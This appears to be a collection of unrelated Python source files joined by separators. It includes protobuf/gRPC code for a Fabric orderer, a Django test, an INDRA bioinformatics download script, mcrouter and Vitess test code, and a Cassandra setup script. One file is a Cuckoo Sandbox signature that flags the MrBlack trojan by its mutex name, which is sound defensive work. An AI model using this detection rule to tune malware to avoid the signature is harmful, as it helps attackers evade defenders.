_DELIVERRESPONSE.fields_by_name['Error'].enum_type = common_dot_common__pb2._STATUS
_DELIVERRESPONSE.fields_by_name['Block'].message_type = common_dot_common__pb2._BLOCK
_DELIVERRESPONSE.oneofs_by_name['Type'].fields.append(
_DELIVERRESPONSE.fields_by_name['Error'])
_DELIVERRESPONSE.fields_by_name['Error'].containing_oneof = _DELIVERRESPONSE.oneofs_by_name['Type']
_DELIVERRESPONSE.oneofs_by_name['Type'].fields.append(
_DELIVERRESPONSE.fields_by_name['Block'])
_DELIVERRESPONSE.fields_by_name['Block'].containing_oneof = _DELIVERRESPONSE.oneofs_by_name['Type']
DESCRIPTOR.message_types_by_name['BroadcastResponse'] = _BROADCASTRESPONSE
DESCRIPTOR.message_types_by_name['SeekInfo'] = _SEEKINFO
DESCRIPTOR.message_types_by_name['Acknowledgement'] = _ACKNOWLEDGEMENT
DESCRIPTOR.message_types_by_name['DeliverUpdate'] = _DELIVERUPDATE
DESCRIPTOR.message_types_by_name['DeliverResponse'] = _DELIVERRESPONSE
BroadcastResponse = _reflection.GeneratedProtocolMessageType('BroadcastResponse', (_message.Message,), dict(
DESCRIPTOR = _BROADCASTRESPONSE,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.BroadcastResponse)
))
_sym_db.RegisterMessage(BroadcastResponse)
SeekInfo = _reflection.GeneratedProtocolMessageType('SeekInfo', (_message.Message,), dict(
DESCRIPTOR = _SEEKINFO,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.SeekInfo)
))
_sym_db.RegisterMessage(SeekInfo)
Acknowledgement = _reflection.GeneratedProtocolMessageType('Acknowledgement', (_message.Message,), dict(
DESCRIPTOR = _ACKNOWLEDGEMENT,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.Acknowledgement)
))
_sym_db.RegisterMessage(Acknowledgement)
DeliverUpdate = _reflection.GeneratedProtocolMessageType('DeliverUpdate', (_message.Message,), dict(
DESCRIPTOR = _DELIVERUPDATE,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.DeliverUpdate)
))
_sym_db.RegisterMessage(DeliverUpdate)
DeliverResponse = _reflection.GeneratedProtocolMessageType('DeliverResponse', (_message.Message,), dict(
DESCRIPTOR = _DELIVERRESPONSE,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.DeliverResponse)
))
_sym_db.RegisterMessage(DeliverResponse)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('Z,github.com/hyperledger/fabric/protos/orderer'))
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
class AtomicBroadcastStub(object):
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Broadcast = channel.stream_stream(
'/orderer.AtomicBroadcast/Broadcast',
request_serializer=common_dot_common__pb2.Envelope.SerializeToString,
response_deserializer=BroadcastResponse.FromString,
)
self.Deliver = channel.stream_stream(
'/orderer.AtomicBroadcast/Deliver',
request_serializer=DeliverUpdate.SerializeToString,
response_deserializer=DeliverResponse.FromString,
)
class AtomicBroadcastServicer(object):
def Broadcast(self, request_iterator, context):
"""broadcast receives a reply of Acknowledgement for each common.Envelope in order, indicating success or type of failure
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Deliver(self, request_iterator, context):
"""deliver first requires an update containing a seek message, then a stream of block replies is received.
The receiver may choose to send an Acknowledgement for any block number it receives, however Acknowledgements must never be more than WindowSize apart
To avoid latency, clients will likely acknowledge before the WindowSize has been exhausted, preventing the server from stopping and waiting for an Acknowledgement
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AtomicBroadcastServicer_to_server(servicer, server):
rpc_method_handlers = {
'Broadcast': grpc.stream_stream_rpc_method_handler(
servicer.Broadcast,
request_deserializer=common_dot_common__pb2.Envelope.FromString,
response_serializer=BroadcastResponse.SerializeToString,
),
'Deliver': grpc.stream_stream_rpc_method_handler(
servicer.Deliver,
request_deserializer=DeliverUpdate.FromString,
response_serializer=DeliverResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'orderer.AtomicBroadcast', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
class BetaAtomicBroadcastServicer(object):
def Broadcast(self, request_iterator, context):
"""broadcast receives a reply of Acknowledgement for each common.Envelope in order, indicating success or type of failure
"""
context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)
def Deliver(self, request_iterator, context):
"""deliver first requires an update containing a seek message, then a stream of block replies is received.
The receiver may choose to send an Acknowledgement for any block number it receives, however Acknowledgements must never be more than WindowSize apart
To avoid latency, clients will likely acknowledge before the WindowSize has been exhausted, preventing the server from stopping and waiting for an Acknowledgement
"""
context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)
class BetaAtomicBroadcastStub(object):
def Broadcast(self, request_iterator, timeout, metadata=None, with_call=False, protocol_options=None):
"""broadcast receives a reply of Acknowledgement for each common.Envelope in order, indicating success or type of failure
"""
raise NotImplementedError()
def Deliver(self, request_iterator, timeout, metadata=None, with_call=False, protocol_options=None):
"""deliver first requires an update containing a seek message, then a stream of block replies is received.
The receiver may choose to send an Acknowledgement for any block number it receives, however Acknowledgements must never be more than WindowSize apart
To avoid latency, clients will likely acknowledge before the WindowSize has been exhausted, preventing the server from stopping and waiting for an Acknowledgement
"""
raise NotImplementedError()
def beta_create_AtomicBroadcast_server(servicer, pool=None, pool_size=None, default_timeout=None, maximum_timeout=None):
request_deserializers = {
('orderer.AtomicBroadcast', 'Broadcast'): common_dot_common__pb2.Envelope.FromString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverUpdate.FromString,
}
response_serializers = {
('orderer.AtomicBroadcast', 'Broadcast'): BroadcastResponse.SerializeToString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverResponse.SerializeToString,
}
method_implementations = {
('orderer.AtomicBroadcast', 'Broadcast'): face_utilities.stream_stream_inline(servicer.Broadcast),
('orderer.AtomicBroadcast', 'Deliver'): face_utilities.stream_stream_inline(servicer.Deliver),
}
server_options = beta_implementations.server_options(request_deserializers=request_deserializers, response_serializers=response_serializers, thread_pool=pool, thread_pool_size=pool_size, default_timeout=default_timeout, maximum_timeout=maximum_timeout)
return beta_implementations.server(method_implementations, options=server_options)
def beta_create_AtomicBroadcast_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):
request_serializers = {
('orderer.AtomicBroadcast', 'Broadcast'): common_dot_common__pb2.Envelope.SerializeToString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverUpdate.SerializeToString,
}
response_deserializers = {
('orderer.AtomicBroadcast', 'Broadcast'): BroadcastResponse.FromString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverResponse.FromString,
}
cardinalities = {
'Broadcast': cardinality.Cardinality.STREAM_STREAM,
'Deliver': cardinality.Cardinality.STREAM_STREAM,
}
stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)
return beta_implementations.dynamic_stub(channel, 'orderer.AtomicBroadcast', cardinalities, options=stub_options)
# @@protoc_insertion_point(module_scope)
|
"""Create your test for the appointment DRF urls."""
import pytest
from django.urls import resolve, reverse
from onebarangay_psql.appointment.models import Appointment
pytestmark = pytest.mark.django_db
class TestAppointmentViewSetUrls:
"""Test DRF URls for AnnouncementViewSet."""
def test_appointment_detail(self, appointment: Appointment):
"""Test appointment 'detail' drf url to reverse and resolve.
Args:
appointment (Appointment): Appointment object to test.
"""
assert (
reverse("api:appointment-detail", kwargs={"pk": appointment.pk})
== f"/api/appointment/{appointment.pk}/"
)
assert (
resolve(f"/api/appointment/{appointment.pk}/").view_name
== "api:appointment-detail"
)
def test_appointment_list(self):
"""Test appointment 'list' drf url to reverse and resolve."""
assert reverse("api:appointment-list") == "/api/appointment/"
assert resolve("/api/appointment/").view_name == "api:appointment-list"
|
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
import gzip
import pandas
import rdflib
from indra.util import read_unicode_csv, write_unicode_csv
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
import logging
import requests
from indra.util import read_unicode_csv, write_unicode_csv
from indra.preassembler.make_cellular_component_hierarchy import \
get_cellular_components
from indra.preassembler.make_cellular_component_hierarchy import \
main as make_ccomp_hierarchy
from indra.preassembler.make_entity_hierarchy import \
main as make_ent_hierarchy
from indra.preassembler.make_activity_hierarchy import \
main as make_act_hierarchy
from indra.preassembler.make_modification_hierarchy import \
main as make_mod_hierarchy
path = os.path.dirname(__file__)
logging.basicConfig(format='%(levelname)s: indra/%(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger('update_resources')
logging.getLogger('urllib3').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.ERROR)
logger.setLevel(logging.INFO)
def load_from_http(url):
logger.info('Downloading %s' % url)
res = requests.get(url)
if res.status_code != 200:
logger.error('Failed to download "%s"' % url)
return
return res.content
def save_from_http(url, fname):
content = load_from_http(url)
if content is None:
return
logger.info('Saving into %s' % fname)
with open(fname, 'wb') as fh:
fh.write(content)
def update_hgnc_entries():
logger.info('--Updating HGNC entries-----')
url = 'http://tinyurl.com/y83dx5s6'
fname = os.path.join(path, 'hgnc_entries.tsv')
save_from_http(url, fname)
def update_kinases():
logger.info('--Updating kinase list------')
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=entry_name&desc=no&compress=no&query=database:(type:' + \
'interpro%20ipr011009)%20AND%20reviewed:yes%20AND%20organism:' + \
'%22Homo%20sapiens%20(Human)%20[9606]%22&fil=&force=no' + \
'&format=tab&columns=id,genes(PREFERRED),organism-id,entry%20name'
fname = os.path.join(path, 'kinases.tsv')
save_from_http(url, fname)
def update_uniprot_entries():
logger.info('--Updating UniProt entries--')
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:yes&' + \
'format=tab&columns=id,genes(PREFERRED),' + \
'entry%20name,database(RGD),database(MGI)'
reviewed_entries = load_from_http(url)
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:no&fil=organism:' + \
'%22Homo%20sapiens%20(Human)%20[9606]%22&' + \
'format=tab&columns=id,genes(PREFERRED),entry%20name,' + \
'database(RGD),database(MGI)'
unreviewed_human_entries = load_from_http(url)
if not((reviewed_entries is not None) and
(unreviewed_human_entries is not None)):
return
unreviewed_human_entries = unreviewed_human_entries.decode('utf-8')
reviewed_entries = reviewed_entries.decode('utf-8')
lines = reviewed_entries.strip('\n').split('\n')
lines += unreviewed_human_entries.strip('\n').split('\n')[1:]
# At this point, we need to clean up the gene names.
logging.info('Processing UniProt entries list.')
for i, line in enumerate(lines):
if i == 0:
continue
terms = line.split('\t')
# If there are multiple gene names, take the first one
gene_names = terms[1].split(';')
terms[1] = gene_names[0]
# Join the line again after the change
lines[i] = '\t'.join(terms)
# Join all lines into a single string
full_table = '\n'.join(lines)
fname = os.path.join(path, 'uniprot_entries.tsv')
logging.info('Saving into %s.' % fname)
with open(fname, 'wb') as fh:
fh.write(full_table.encode('utf-8'))
def update_uniprot_sec_ac():
logger.info('--Updating UniProt secondary accession--')
url = 'ftp://ftp.uniprot.org/pub/databases/uniprot/knowledgebase/' + \
'docs/sec_ac.txt'
logger.info('Downloading %s' % url)
fname = os.path.join(path, 'uniprot_sec_ac.txt')
urlretrieve(url, fname)
def update_uniprot_subcell_loc():
# TODO: This file could be stored as a tsv instead after some processing
logger.info('--Updating UniProt subcellular location--')
url = 'http://www.uniprot.org/locations/?' + \
'%20sort=&desc=&compress=no&query=&force=no&format=tab&columns=id'
fname = os.path.join(path, 'uniprot_subcell_loc.tsv')
save_from_http(url, fname)
def update_chebi_entries():
logger.info('--Updating ChEBI entries----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/reference.tsv.gz'
fname = os.path.join(path, 'reference.tsv.gz')
urlretrieve(url, fname)
with gzip.open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
df = pandas.read_csv(fh, sep='\t', index_col=None,
parse_dates=True, encoding='latin-1')
# Save PubChem mapping
fname = os.path.join(path, 'chebi_to_pubchem.tsv')
logger.info('Saving into %s' % fname)
df_pubchem = df[df['REFERENCE_DB_NAME']=='PubChem']
df_pubchem.sort_values(['COMPOUND_ID', 'REFERENCE_ID'], ascending=True,
inplace=True)
df_pubchem.to_csv(fname, sep='\t', columns=['COMPOUND_ID', 'REFERENCE_ID'],
header=['CHEBI', 'PUBCHEM'], index=False)
# Process PubChem mapping to eliminate SID rows and strip CID: prefix
# If the second column of the row starts with SID:, ignore the row
# If the second column of the row starts with CID:, strip out the CID prefix
# Otherwise, include the row unchanged
original_rows = read_unicode_csv(fname, '\t')
new_rows = []
for original_row in original_rows:
if original_row[1].startswith('CID:'):
new_row = original_row
new_row[1] = new_row[1][5:] # Strip out CID:
new_rows.append(new_row)
elif original_row[1].startswith('SID:'):
# Skip SID rows
continue
else:
# Include other rows unchanges
new_rows.append(original_row)
write_unicode_csv(fname, new_rows, '\t')
# Save ChEMBL mapping
fname = os.path.join(path, 'chebi_to_chembl.tsv')
logger.info('Saving into %s' % fname)
df_chembl = df[df['REFERENCE_DB_NAME']=='ChEMBL']
df_chembl.sort_values(['COMPOUND_ID', 'REFERENCE_ID'], ascending=True,
inplace=True)
df_chembl.to_csv(fname, sep='\t', columns=['COMPOUND_ID', 'REFERENCE_ID'],
header=['CHEBI', 'CHEMBL'], index=False)
def update_cas_to_chebi():
logger.info('--Updating CAS to ChEBI entries----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/database_accession.tsv'
fname = os.path.join(path, 'database_accession.tsv')
urlretrieve(url, fname)
with open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
df = pandas.DataFrame.from_csv(fh, sep='\t', index_col=None)
fname = os.path.join(path, 'cas_to_chebi.tsv')
logger.info('Saving into %s' % fname)
df_cas = df[df['TYPE'] == 'CAS Registry Number']
df_cas.sort_values(['ACCESSION_NUMBER', 'COMPOUND_ID'], ascending=True,
inplace=True)
# Here we need to map to primary ChEBI IDs
with open(os.path.join(path, 'chebi_to_primary.tsv'), 'rb') as fh:
df_prim = pandas.DataFrame.from_csv(fh, sep='\t', index_col=None)
mapping = {s: p for s, p in zip(df_prim['Secondary'].tolist(),
df_prim['Primary'].tolist())}
df_cas.COMPOUND_ID.replace(mapping, inplace=True)
df_cas.drop_duplicates(subset=['ACCESSION_NUMBER', 'COMPOUND_ID'],
inplace=True)
df_cas.to_csv(fname, sep='\t',
columns=['ACCESSION_NUMBER', 'COMPOUND_ID'],
header=['CAS', 'CHEBI'], index=False)
def update_chebi_primary_map():
logger.info('--Updating ChEBI primary map entries----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/compounds.tsv.gz'
fname = os.path.join(path, 'compounds.tsv.gz')
urlretrieve(url, fname)
with gzip.open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
df = pandas.read_csv(fh, sep='\t', index_col=None,
parse_dates=True, dtype='str')
fname = os.path.join(path, 'chebi_to_primary.tsv')
logger.info('Saving into %s' % fname)
df = df[df['PARENT_ID'].notna()]
df.replace('CHEBI:([0-9]+)', r'\1', inplace=True, regex=True)
df.sort_values(['CHEBI_ACCESSION', 'PARENT_ID'], ascending=True,
inplace=True)
df.drop_duplicates(subset=['CHEBI_ACCESSION', 'PARENT_ID'], inplace=True)
print('Writing chebi map to', fname)
df.to_csv(fname, sep='\t',
columns=['CHEBI_ACCESSION', 'PARENT_ID'],
header=['Secondary', 'Primary'], index=False)
def update_cellular_components():
logger.info('--Updating GO cellular components----')
url = 'http://purl.obolibrary.org/obo/go.owl'
fname = os.path.join(path, '../../data/go.owl')
save_from_http(url, fname)
g = rdflib.Graph()
g.parse(os.path.abspath(fname))
component_map, component_part_map = get_cellular_components(g)
fname = os.path.join(path, 'cellular_components.tsv')
logger.info('Saving into %s' % fname)
with open(fname, 'wb') as fh:
fh.write('id\tname\n'.encode('utf-8'))
for comp_id, comp_name in sorted(component_map.items(),
key=lambda x: x[0]):
fh.write(('%s\t%s\n' % (comp_id, comp_name)).encode('utf-8'))
def update_bel_chebi_map():
logger.info('--Updating BEL ChEBI map----')
id_lines = []
name_lines = []
url = 'https://raw.githubusercontent.com/OpenBEL/' + \
'openbel-framework-resources/latest/equivalence/'
url1 = url + 'chebi-ids.beleq'
url2 = url + 'chebi.beleq'
res1 = load_from_http(url1).decode('utf-8')
res2 = load_from_http(url2).decode('utf-8')
id_lines1 = [lin.strip() for lin in res1.split('\n') if lin]
start = id_lines1.index('[Values]')
id_lines1 = id_lines1[start+1:]
id_lines += id_lines1
name_lines1 = [lin.strip() for lin in res2.split('\n') if lin]
start = name_lines1.index('[Values]')
name_lines1 = name_lines1[start + 1:]
name_lines += name_lines1
# Here we need to get the ChEBI to primary map to make sure we map
# to primary IDs
with open(os.path.join(path, 'chebi_to_primary.tsv'), 'r') as fh:
chebi_to_primary = {k: v for k, v in
[l.strip().split('\t') for
l in fh.readlines()][1:]}
id_map = {}
for id_line in id_lines:
if id_line:
# Instead of splitting on |, split using UUID fixed length
chebi_id = id_line[:-37]
uuid = id_line[-36:]
# Map secondary IDs to primary IDs before adding to the map
if chebi_id in chebi_to_primary:
chebi_id = chebi_to_primary[chebi_id]
id_map[uuid] = chebi_id
name_map = {}
for name_line in name_lines:
if name_line:
# Instead of splitting on |, split using UUID fixed length
chebi_name = name_line[:-37]
uuid = name_line[-36:]
name_map[uuid] = chebi_name
name_to_id = {}
for uuid, chebi_name in name_map.items():
chebi_id = id_map.get(uuid)
if chebi_id is not None:
if chebi_name in name_to_id:
old_id = int(name_to_id[chebi_name])
new_id = int(chebi_id)
if new_id <= old_id:
continue
name_to_id[chebi_name] = chebi_id
fname = os.path.join(path, 'bel_chebi_map.tsv')
logger.info('Saving into %s' % fname)
with open(fname, 'wb') as fh:
for chebi_name, chebi_id in sorted(name_to_id.items(),
key=lambda x: x[0]):
fh.write(('%s\tCHEBI:%s\n' % (chebi_name, chebi_id)).encode('utf-8'))
def update_entity_hierarchy():
logger.info('--Updating entity hierarchy----')
fname = os.path.join(path, 'famplex/relations.csv')
make_ent_hierarchy(fname)
def update_modification_hierarchy():
logger.info('--Updating modification hierarchy----')
make_mod_hierarchy()
def update_activity_hierarchy():
logger.info('--Updating activity hierarchy----')
make_act_hierarchy()
def update_cellular_component_hierarchy():
logger.info('--Updating cellular component hierarchy----')
make_ccomp_hierarchy()
def update_famplex_map():
logger.info('--Updating FamPlex map----')
# Currently this is a trivial "copy" of the FamPlex equivalences.csv
# file. Later, name spaces may need to be adapted and other format changes
# may be needed.
fname_in = os.path.join(path, 'famplex/equivalences.csv')
fname_out = os.path.join(path, 'famplex_map.tsv')
rows = read_unicode_csv(fname_in)
write_unicode_csv(fname_out, rows, delimiter='\t')
def update_ncit_map():
logger.info('--Updating NCIT map----')
url_hgnc = 'https://ncit.nci.nih.gov/ncitbrowser/ajax?action=' + \
'export_mapping&dictionary=NCIt_to_HGNC_Mapping&version=1.0'
url_go = 'https://ncit.nci.nih.gov/ncitbrowser/ajax?action=' + \
'export_mapping&dictionary=GO_to_NCIt_Mapping&version=1.1'
url_chebi = 'https://ncit.nci.nih.gov/ncitbrowser/ajax?action=' + \
'export_mapping&dictionary=NCIt_to_ChEBI_Mapping&version=1.0'
def get_ncit_df(url):
df = pandas.read_csv(url)
df = df[df['Association Name'] == 'mapsTo']
df.sort_values(['Source Code', 'Target Code'], ascending=True,
inplace=True)
df = df[['Source Code', 'Target Code', 'Source Coding Scheme',
'Target Coding Scheme']]
return df
df_hgnc = get_ncit_df(url_hgnc)
df_hgnc.replace('HGNC:(\d*)\s*', '\\1', inplace=True, regex=True)
df_go = get_ncit_df(url_go)
df_go.rename(columns={'Source Code': 'Target Code',
'Target Code': 'Source Code',
'Source Coding Scheme': 'Target Coding Scheme',
'Target Coding Scheme': 'Source Coding Scheme'},
inplace=True)
df_chebi = get_ncit_df(url_chebi)
df_chebi.replace('ChEBI', 'CHEBI', inplace=True)
# Add the old HGNC mappings
df_hgnc_old = pandas.read_csv('ncit_hgnc_map_old.tsv', sep='\t',
index_col=None, dtype=str)
df_hgnc = df_hgnc.append(df_hgnc_old)
df_hgnc.sort_values(['Source Code', 'Target Code'], ascending=True,
inplace=True)
# Add UniProt mappings
df_uniprot = pandas.read_csv('Feb2017NCIt-SwissProt.txt', sep='\t',
index_col=None)
up_entries = {'Source Code': [], 'Target Coding Scheme': [],
'Target Code': []}
for entry in df_uniprot.iterrows():
up_entries['Source Code'].append(entry[1]['code'].strip())
up_entries['Target Coding Scheme'].append('UP')
up_entries['Target Code'].append(entry[1]['Swiss_Prot'].strip())
df_uniprot = pandas.DataFrame.from_dict(up_entries)
df_uniprot.sort_values(['Source Code', 'Target Code'], ascending=True,
inplace=True)
df_all = pandas.concat([df_chebi, df_go, df_hgnc, df_uniprot])
fname = os.path.join(path, 'ncit_map.tsv')
df_all.to_csv(fname, sep='\t', columns=['Source Code',
'Target Coding Scheme',
'Target Code'],
header=['NCIT ID', 'Target NS', 'Target ID'], index=False)
def update_chebi_names():
logger.info('--Updating ChEBI names----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/names_3star.tsv.gz'
fname = os.path.join(path, 'names_3star.tsv.gz')
urlretrieve(url, fname)
with gzip.open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
df = pandas.DataFrame.from_csv(fh, sep='\t', index_col=None)
fname = os.path.join(path, 'chebi_names.tsv')
df = df[df['TYPE'] == 'NAME']
df.sort_values(by='COMPOUND_ID', inplace=True)
logger.info('Saving into %s' % fname)
df.to_csv(fname, sep='\t', header=True, index=False,
columns=['COMPOUND_ID', 'NAME'])
def update_famplex():
"""Update all the CSV files that form the FamPlex resource."""
famplex_url_pattern = \
'https://raw.githubusercontent.com/sorgerlab/famplex/master/%s.csv'
csv_names = ['entities', 'equivalences', 'gene_prefixes',
'grounding_map', 'relations']
for csv_name in csv_names:
url = famplex_url_pattern % csv_name
save_from_http(url, os.path.join(path,'famplex/%s.csv' % csv_name))
if __name__ == '__main__':
update_famplex()
update_famplex_map()
update_hgnc_entries()
update_kinases()
update_uniprot_entries()
update_uniprot_sec_ac()
update_uniprot_subcell_loc()
update_chebi_entries()
update_chebi_names()
update_chebi_primary_map()
update_cas_to_chebi()
update_cellular_components()
update_bel_chebi_map()
update_entity_hierarchy()
update_modification_hierarchy()
update_activity_hierarchy()
update_cellular_component_hierarchy()
update_ncit_map()
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the LICENSE
# file in the root directory of this source tree.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import time
from mcrouter.test.MCProcess import Mcrouter, Memcached, MockMemcached
class McrouterTestCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(McrouterTestCase, self).__init__(*args, **kwargs)
self.use_mock_mc = False
def ensureClassVariables(self):
if 'open_servers' not in self.__dict__:
self.open_servers = []
if 'open_ports' not in self.__dict__:
self.open_ports = []
def add_server(self, server, logical_port=None):
self.ensureClassVariables()
server.ensure_connected()
self.open_servers.append(server)
self.open_ports.append(server.getport())
if logical_port:
if 'port_map' not in self.__dict__:
self.port_map = {}
if logical_port in self.port_map:
raise Exception("logical_port %d was already used"
% logical_port)
self.port_map[logical_port] = server.getport()
return server
def add_mcrouter(self, config, route=None, extra_args=None,
replace_map=None, bg_mcrouter=False):
self.ensureClassVariables()
substitute_ports = (self.open_ports
if 'port_map' not in self.__dict__
else self.port_map)
mcrouter = Mcrouter(config,
substitute_config_ports=substitute_ports,
default_route=route,
extra_args=extra_args,
replace_map=replace_map)
mcrouter.ensure_connected()
if bg_mcrouter:
self.open_ports.append(mcrouter.getport())
if 'open_mcrouters' not in self.__dict__:
self.open_mcrouters = []
self.open_mcrouters.append(mcrouter)
return mcrouter
def make_memcached(self):
return MockMemcached() if self.use_mock_mc else Memcached()
def get_open_ports(self):
self.ensureClassVariables()
return self.open_ports
def tearDown(self):
# Stop mcrouters first to close connections to servers
# (some mock severs might be blocked on recv() calls)
if 'open_mcrouters' in self.__dict__:
for mcr in self.open_mcrouters:
mcr.terminate()
if 'open_servers' in self.__dict__:
for server in self.open_servers:
server.terminate()
def eventually_get(self, key, expVal, timeout=5):
start_time = time.time()
interval = 0.5
while (True):
if (self.mc.get(key) == expVal):
return True
time.sleep(interval)
now = time.time()
if (now - start_time > timeout):
return False
|
# Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# This signature was contributed by RedSocks - http://redsocks.nl
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class trojanmrblack(Signature):
name = "trojan_mrblack"
description = "Creates known MrBlack Trojan files, registry keys and/or mutexes"
severity = 3
categories = ["trojan"]
families = ["mrblack"]
authors = ["RedSocks"]
minimum = "2.0"
mutexes_re = [
".*MrBLaCK",
]
def on_complete(self):
for indicator in self.mutexes_re:
mutex = self.check_mutex(pattern=indicator, regex=True)
if mutex:
self.mark_ioc("mutex", mutex)
return self.has_marks()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''Script to setup GraphSense keyspaces.'''
from argparse import ArgumentParser
from cassandra.cluster import Cluster
DEFAULT_TIMEOUT = 60
KEYSPACE_PLACEHOLDER = 'btc_transformed'
class StorageError(Exception):
'''Class for Cassandra-related errors'''
def __init__(self, message, nested_exception=None):
super().__init__('Cassandra Error: ' + message)
self.nested_exception = nested_exception
def __str__(self):
msg = super(StorageError, self).__str__()
if self.nested_exception:
msg = msg + '\nError Details: ' + str(self.nested_exception)
return msg
class Cassandra:
'''Cassandra connector'''
def __init__(self, db_nodes):
self.db_nodes = db_nodes
self.cluster = None
self.session = None
def connect(self):
'''Connect to given Cassandra cluster nodes.'''
self.cluster = Cluster(self.db_nodes)
try:
self.session = self.cluster.connect()
self.session.default_timeout = DEFAULT_TIMEOUT
except Exception as e:
raise StorageError(f'Cannot connect to {self.db_nodes}', e)
def has_keyspace(self, keyspace):
'''Check whether a given keyspace is present in the cluster.'''
if not self.session:
raise StorageError('Session not available. Call connect() first')
try:
query = 'SELECT keyspace_name FROM system_schema.keyspaces'
result = self.session.execute(query)
keyspaces = [row.keyspace_name for row in result]
return keyspace in keyspaces
except Exception as e:
raise StorageError(f'Error when executing query:\n{query}', e)
def setup_keyspace(self, keyspace, schema_file):
'''Setup keyspace and tables.'''
if not self.session:
raise StorageError('Session not available, call connect() first')
with open(schema_file, 'r') as fh:
schema = fh.read()
# replace keyspace name placeholder in CQL schema script
schema = schema.replace(KEYSPACE_PLACEHOLDER, keyspace)
statements = schema.split(';')
for stmt in statements:
stmt = stmt.strip()
if len(stmt) > 0:
self.session.execute(stmt + ';')
def close(self):
'''Closes the cassandra cluster connection.'''
self.cluster.shutdown()
def main():
'''Main function.'''
parser = ArgumentParser(description='Create keyspace in Cassandra',
epilog='GraphSense - http://graphsense.info')
parser.add_argument('-d', '--db_nodes', dest='db_nodes', nargs='+',
default='localhost', metavar='DB_NODE',
help='list of Cassandra nodes (default "localhost")')
parser.add_argument('-k', '--keyspace', dest='keyspace_name',
required=True, metavar='KEYSPACE',
help='name of GraphSense keyspace')
parser.add_argument('-s', '--schema', dest='schema_template',
required=True, metavar='CQL_SCHEMA',
help='Cassandra schema for GraphSense keyspace')
args = parser.parse_args()
cassandra = Cassandra(args.db_nodes)
cassandra.connect()
if not cassandra.has_keyspace(args.keyspace_name):
cassandra.setup_keyspace(args.keyspace_name, args.schema_template)
print(f'Success: Keyspace "{args.keyspace_name}" created.')
else:
print(f'Error: Keyspace "{args.keyspace_name}" already exists.')
cassandra.close()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
import json
import logging
import re
import time
import unittest
import urllib2
from vtproto import topodata_pb2
import environment
import tablet
import utils
# range '' - 80
shard_0_master = tablet.Tablet(use_mysqlctld=True)
shard_0_replica = tablet.Tablet(use_mysqlctld=True)
shard_0_rdonly = tablet.Tablet(use_mysqlctld=True)
all_shard_0_tablets = [shard_0_master, shard_0_replica, shard_0_rdonly]
# range 80 - ''
shard_1_master = tablet.Tablet(use_mysqlctld=True)
shard_1_replica = tablet.Tablet(use_mysqlctld=True)
shard_1_rdonly = tablet.Tablet(use_mysqlctld=True)
all_shard_1_tablets = [shard_1_master, shard_1_replica, shard_1_rdonly]
# all tablets
all_tablets = all_shard_0_tablets + all_shard_1_tablets
def setUpModule():
try:
environment.topo_server().setup()
for t in all_tablets:
t.init_mysql()
utils.Vtctld().start()
for t in all_tablets:
t.wait_for_mysqlctl_socket()
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [t.teardown_mysql() for t in all_tablets]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
for t in all_tablets:
t.remove_tree()
class TestSchemaSwap(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._start_tablets('-80',
[shard_0_master, shard_0_replica],
[shard_0_rdonly])
